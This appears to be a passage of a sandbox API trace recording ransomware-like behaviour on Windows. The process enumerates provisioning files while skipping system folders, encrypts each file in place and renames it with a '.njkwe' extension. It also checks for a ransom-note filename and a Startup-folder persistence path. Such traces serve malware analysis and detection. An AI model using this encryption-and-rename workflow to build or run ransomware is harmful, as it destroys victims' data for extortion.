(lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\409__connections_cellular_vodafone es (spain)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\409__Connections_Cellular_vodafone ES (Spain)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\409__connections_cellular_vodafone es (spain)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.126] GetProcessHeap () returned 0xbe0000 [0079.126] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.126] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90221ca6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90221ca6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90221ca6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x353, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", cAlternateFileName="40__CO~1.PRO")) returned 1 [0079.126] lstrcmpiW (lpString1="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.126] lstrcmpiW (lpString1="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.126] lstrcmpiW (lpString1="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.126] lstrcmpiW (lpString1="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.126] lstrcmpiW (lpString1="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.126] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml") returned 159 [0079.126] StrStrIW (lpFirst="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.126] lstrcmpW (lpString1="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.126] lstrcmpW (lpString1="40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.126] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\40__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.127] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\40__connections_cellular_velcom (belarus)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.127] GetTickCount () returned 0x11541a9 [0079.127] GetTickCount () returned 0x11541a9 [0079.127] GetTickCount () returned 0x11541a9 [0079.127] GetTickCount () returned 0x11541a9 [0079.127] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.127] GetProcessHeap () returned 0xbe0000 [0079.127] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.127] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0079.129] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.129] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x353, lpOverlapped=0x0) returned 1 [0079.129] GetProcessHeap () returned 0xbe0000 [0079.129] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.129] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.129] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.129] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.129] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.129] CloseHandle (hObject=0x43c) returned 1 [0079.129] GetProcessHeap () returned 0xbe0000 [0079.129] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.129] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0079.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\40__connections_cellular_velcom (belarus)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\40__Connections_Cellular_VELCOM (Belarus)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\40__connections_cellular_velcom (belarus)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.130] GetProcessHeap () returned 0xbe0000 [0079.130] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.130] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ef2cc3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ef2cc3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ef2cc3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", cAlternateFileName="410__C~1.PRO")) returned 1 [0079.130] lstrcmpiW (lpString1="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.130] lstrcmpiW (lpString1="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.130] lstrcmpiW (lpString1="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.130] lstrcmpiW (lpString1="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.130] lstrcmpiW (lpString1="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.130] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml") returned 163 [0079.130] StrStrIW (lpFirst="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.130] lstrcmpW (lpString1="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.130] lstrcmpW (lpString1="410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.130] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\410__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.130] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\410__connections_cellular_vodafone es (spain)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.131] GetTickCount () returned 0x11541a9 [0079.131] GetTickCount () returned 0x11541a9 [0079.131] GetTickCount () returned 0x11541a9 [0079.131] GetTickCount () returned 0x11541a9 [0079.131] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.131] GetProcessHeap () returned 0xbe0000 [0079.131] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.131] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0079.132] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.133] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x352, lpOverlapped=0x0) returned 1 [0079.133] GetProcessHeap () returned 0xbe0000 [0079.133] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.133] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.133] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.133] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.133] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.133] CloseHandle (hObject=0x43c) returned 1 [0079.133] GetProcessHeap () returned 0xbe0000 [0079.133] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.133] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0079.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\410__connections_cellular_vodafone es (spain)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\410__Connections_Cellular_vodafone ES (Spain)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\410__connections_cellular_vodafone es (spain)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.134] GetProcessHeap () returned 0xbe0000 [0079.134] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.134] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ef2cc3, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ef2cc3, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ef2cc3, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="411__C~1.PRO")) returned 1 [0079.134] lstrcmpiW (lpString1="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0079.134] lstrcmpiW (lpString1="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0079.134] lstrcmpiW (lpString1="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0079.134] lstrcmpiW (lpString1="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0079.134] lstrcmpiW (lpString1="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0079.134] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0079.134] StrStrIW (lpFirst="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0079.134] lstrcmpW (lpString1="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.134] lstrcmpW (lpString1="411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0079.134] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\411__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.134] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\411__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.135] GetTickCount () returned 0x11541a9 [0079.135] GetTickCount () returned 0x11541a9 [0079.135] GetTickCount () returned 0x11541a9 [0079.135] GetTickCount () returned 0x11541a9 [0079.135] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.135] GetProcessHeap () returned 0xbe0000 [0079.135] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.135] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0079.136] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.136] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0079.136] GetProcessHeap () returned 0xbe0000 [0079.136] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.136] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.136] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.137] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.137] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.137] CloseHandle (hObject=0x43c) returned 1 [0079.137] GetProcessHeap () returned 0xbe0000 [0079.137] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.138] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0079.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\411__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\411__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\411__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.138] GetProcessHeap () returned 0xbe0000 [0079.138] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.138] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f18f32, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f18f32, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f18f32, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", cAlternateFileName="412__C~1.PRO")) returned 1 [0079.138] lstrcmpiW (lpString1="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.138] lstrcmpiW (lpString1="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.138] lstrcmpiW (lpString1="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.138] lstrcmpiW (lpString1="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.138] lstrcmpiW (lpString1="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.138] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml") returned 157 [0079.138] StrStrIW (lpFirst="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.138] lstrcmpW (lpString1="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.138] lstrcmpW (lpString1="412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.138] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\412__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.139] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\412__Connections_Cellular_Yoigo (Spain)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\412__connections_cellular_yoigo (spain)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.139] GetTickCount () returned 0x11541b8 [0079.139] GetTickCount () returned 0x11541b8 [0079.139] GetTickCount () returned 0x11541b8 [0079.139] GetTickCount () returned 0x11541b8 [0079.139] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.139] GetProcessHeap () returned 0xbe0000 [0079.139] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.139] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0079.141] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.141] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0079.141] GetProcessHeap () returned 0xbe0000 [0079.141] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.141] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.141] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.141] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, 